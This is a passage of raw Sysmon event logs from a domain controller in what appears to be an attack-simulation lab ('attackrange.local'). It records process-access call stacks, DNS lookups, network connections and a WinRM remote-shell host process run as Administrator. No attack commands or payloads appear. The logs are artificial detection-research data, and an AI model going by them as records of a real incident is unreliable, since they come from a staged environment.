l+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000003237Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:25.033{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6494-6064-7F00-00000000AE01}4024C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003236Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.018{266CAFBE-6495-6064-8000-00000000AE01}42683844C:\Windows\system32\conhost.exe{266CAFBE-6494-6064-7F00-00000000AE01}4024C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000003235Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.728{266CAFBE-646A-6064-0B00-00000000AE01}856_kpasswd._udp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003234Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.726{266CAFBE-646A-6064-0B00-00000000AE01}856_kpasswd._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003233Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.724{266CAFBE-646A-6064-0B00-00000000AE01}856_kerberos._udp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003232Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.722{266CAFBE-646A-6064-0B00-00000000AE01}856_gc._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003231Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.720{266CAFBE-646C-6064-1100-00000000AE01}1200win-dc-892.attackrange.local0fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000003230Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.720{266CAFBE-646A-6064-0B00-00000000AE01}856_gc._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003229Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.718{266CAFBE-646A-6064-0B00-00000000AE01}856_kerberos._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003228Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.716{266CAFBE-646A-6064-0B00-00000000AE01}856_kerberos._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003227Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.715{266CAFBE-646A-6064-0B00-00000000AE01}856_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003226Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.713{266CAFBE-646A-6064-0B00-00000000AE01}856_kerberos._tcp.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 
22542200x80000000000000003225Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.711{266CAFBE-646A-6064-0B00-00000000AE01}856gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003224Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.709{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003223Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.707{266CAFBE-647D-6064-3600-00000000AE01}2704win-dc-892.attackrange.local0fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\dfssvc.exe 22542200x80000000000000003222Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.707{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003221Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.705{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003220Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.703{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003219Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.702{266CAFBE-646A-6064-0B00-00000000AE01}856_msdcs.attackrange.local.0type: 2 win-dc-892.attackrange.local;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003218Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.700{266CAFBE-646A-6064-0B00-00000000AE01}856_msdcs.attackrange.local.0type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003217Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.700{266CAFBE-646A-6064-0B00-00000000AE01}856aee535c1-ccd6-4bd4-b690-6b3c4705ab7f._msdcs.attackrange.local.0type: 5 win-dc-892.attackrange.local;C:\Windows\System32\lsass.exe 22542200x80000000000000003216Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.698{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.ab7030e6-8d8e-4379-abb8-78db4f8810c9.domains._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003215Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.696{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.pdc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003214Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.694{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003213Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.691{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003212Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.691{266CAFBE-646C-6064-1500-00000000AE01}1316eu-central-1.compute.internal9501-C:\Windows\System32\svchost.exe 22542200x80000000000000003211Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.690{266CAFBE-647D-6064-3200-00000000AE01}2716attackrange.local0type: 6 ;10.0.1.14;C:\Windows\System32\dns.exe 
22542200x80000000000000003210Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.690{266CAFBE-646C-6064-1000-00000000AE01}1124win10.ipv6.microsoft.com.9502-C:\Windows\System32\svchost.exe 22542200x80000000000000003209Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.689{266CAFBE-647D-6064-3200-00000000AE01}2716attackrange.local0type: 2 win-dc-892.attackrange.local;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000003208Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.689{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003207Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.689{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.gc._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003206Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.688{266CAFBE-647D-6064-3200-00000000AE01}2716win-dc-892.attackrange.local9501type: 6 ;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000003205Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.688{266CAFBE-646C-6064-1100-00000000AE01}1200attackrange.local0::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000003204Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.688{266CAFBE-646A-6064-0B00-00000000AE01}856attackrange.local.0type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003203Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.688{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.Default-First-Site-Name._sites.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 
22542200x80000000000000003202Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.688{266CAFBE-646C-6064-1500-00000000AE01}1316_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000003201Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.688{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000003200Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.233{266CAFBE-647D-6064-3200-00000000AE01}2716win-dc-892.attackrange.local0fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000003199Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.228{266CAFBE-646A-6064-0B00-00000000AE01}856WIN-DC-8920fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\lsass.exe 10341000x80000000000000003198Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.002{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6495-6064-8000-00000000AE01}4268C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003197Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.986{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003196Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.986{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003195Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.986{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003194Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.986{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003193Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.986{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003192Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.986{266CAFBE-646C-6064-1500-00000000AE01}13161680C:\Windows\system32\svchost.exe{266CAFBE-6494-6064-7D00-00000000AE01}5096C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\win
dows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000003191Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.986{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003190Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.986{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000003189Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.986{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003188Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.986{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003187Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:24.986{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6494-6064-7F00-00000000AE01}4024C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003186Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.986{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6494-6064-7F00-00000000AE01}4024C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003185Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.999{266CAFBE-6494-6064-7F00-00000000AE01}4024C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe 
-EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-648A-6064-DA02-060000000000}0x602da0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 23542300x80000000000000003381Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:26.736{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=68BCDF1212B476DB3583BD35A962B691,SHA256=7BEAC708211278D0A0B6C5C8C3F194B3E379B1696BDA8D3B87FA29AD891D2AF1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000003380Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.578{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local49720-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003379Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.578{266CAFBE-6495-6064-8100-00000000AE01}4272C:\Windows\System32\taskhostw.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local49720-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003378Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.575{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT 